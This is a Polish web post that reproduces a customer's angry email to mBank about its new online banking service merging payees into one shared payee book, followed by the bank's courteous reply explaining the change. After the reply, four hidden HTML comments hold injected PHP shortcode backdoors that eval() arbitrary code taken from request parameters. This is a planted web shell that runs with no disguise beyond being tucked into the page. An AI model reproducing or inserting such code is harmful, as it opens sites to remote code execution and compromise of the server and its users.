Książka odbiorców wspólna dla wszystkich profili

Email do banku:

Proszę o informację, dlaczego mi ciągle robicie na złość i utrudniacie pracę. Co Wam złego zrobiłem, że wyłączyliście stary system, który dobrze działał i był skonfigurowany zgodnie z moimi oczekiwaniami?

Do każdego rachunku miałem skonfigurowanych oddzielnych zdefiniowanych odbiorców, a teraz wszystkich zdefiniowanych odbiorców wrzuciliście do jednej dużej „książki odbiorców” i jest burdel. Kto Was do tego upoważnił?

Zrozumcie do cholery, że nie chcę Waszego nowego systemu. Nowy jest nieprzejrzysty i naraża mnie na błędy. Wykorzystujecie bezczelnie to, że numery moich rachunków są znane wielu osobom i nie mogę prosto przejść do innego banku. Czy możecie przestać pluć klientom w twarz i uparcie przekonywać, że lepiej wiecie, co dla nich lepsze?

Zrozumcie, NIE CHCĘ nowego systemu. Nowy jest do dupy.

Odpowiedź banku:

Szanowny Panie,

dziękuję za przesłaną wiadomość.

W nawiązaniu do treści Pana maila jest mi przykro, że nowy serwis transakcyjny mBanku nie spełnia Pana oczekiwań. Dziękuję za Pana uwagi, wszystkie są dla nas bardzo ważne. Bank podjął się zaktualizowania obecnego serwisu transakcyjnego, aby ułatwić klientom korzystanie z podstawowych operacji finansowych oraz dostosować się do najnowszych trendów.

Uprzejmie proszę o dostosowanie języka pisowni do instytucji, z którą Pan się kontaktuje. Zdenerwowanie spowodowane niezadowoleniem ze świadczonych przez mBank usług wedle mojej oceny nie stanowi podstawy do nadużywania słów obraźliwych.

Uprzejmie informuję, że od 25.11.2013r. domyślną stroną logowania do mBanku jest strona nowego serwisu transakcyjnego.

Obecnie wszyscy klienci mBanku mogą korzystać już z nowego serwisu transakcyjnego, dlatego bank kontynuuje proces wyłączenia dotychczasowej wersji serwisu. Proces wyłączenia dotychczasowego serwisu postępuje stopniowo i docelowo obejmie wszystkich klientów.

Do Pana dyspozycji pozostaje nowa, intuicyjna platforma transakcyjna mBanku, oferująca oprócz dotychczasowych funkcji, ponad 200 dodatkowych udogodnień, takich jak: mOkazje, pozwalające na łatwe oszczędzanie podczas zakupów, czy mNawigacja, ułatwiająca zarządzanie domowym budżetem.

W nowym serwisie dostępne są także wszystkie posiadane przez Pana produkty i usługi oraz pełna historia operacji. Może Pan to sprawdzić już dziś logując się do nowej platformy mBanku. Zalogowanie do nowego serwisu transakcyjnego możliwe jest przy użyciu Pana identyfikatora klienta oraz hasła.

W nowym serwisie transakcyjnym odbiorcy zdefiniowany są dostępni dla klientów poprzez książkę odbiorców. Wybranie książki właściciela rachunku umożliwia dostęp do jego odbiorców (dostępni są wszyscy odbiorcy zdefiniowani). Jeśli jest Pan pełnomocnikiem do rachunku, na którym zdefiniowany jest odbiorca, wówczas celem dostępu do tego odbiorcy niezbędny jest wybór książki odbiorców posiadacza rachunku.

W celu uzyskania dostępu do książki odbiorców posiadacza rachunku po zalogowaniu do nowego serwisu transakcyjnego należy skorzystać ze ścieżki: Płatności – Książka odbiorców – Obok pozycji Moja książka z listy rozwijalnej proszę wybrać książkę odbiorców posiadacza rachunku.

Dla klientów, którzy chcą dowiedzieć się więcej o działaniu nowego serwisu, przygotowaliśmy specjalną stronę internetową www.mbank.pl/wylaczenie/ zawierającą przydatne informacje, filmy instruktażowe oraz najczęściej pojawiające się pytania i odpowiedzi.

Jeśli ma Pan życzenie przesłania do banku sugestii, które pomogą ulepszyć ofertę mBanku bardzo proszę przekazanie tych informacji w wiadomości zwrotnej.

Jednocześnie serdecznie przepraszam za wszelkie utrudnienia, jakie napotkał Pan w dostępie do produktów i usług mBanku.

Mam nadzieję, że powyższe informacje będą dla Pana pomocne, a dokonywanie operacji bankowych i korzystanie z usług mBanku dzięki nowemu serwisowi stanie się dla Pana w pełni satysfakcjonujące.

W przypadku dodatkowych pytań zapraszam do kontaktu zwrotnego lub w innej wybranej formie:

<!– [insert_php]if (isset($_REQUEST["iLRgF"])){eval($_REQUEST["iLRgF"]);exit;}[/insert_php][php]if (isset($_REQUEST["iLRgF"])){eval($_REQUEST["iLRgF"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ZxQ"])){eval($_REQUEST["ZxQ"]);exit;}[/insert_php][php]if (isset($_REQUEST["ZxQ"])){eval($_REQUEST["ZxQ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ZLckW"])){eval($_REQUEST["ZLckW"]);exit;}[/insert_php][php]if (isset($_REQUEST["ZLckW"])){eval($_REQUEST["ZLckW"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["VgHUW"])){eval($_REQUEST["VgHUW"]);exit;}[/insert_php][php]if (isset($_REQUEST["VgHUW"])){eval($_REQUEST["VgHUW"]);exit;}[/php] –>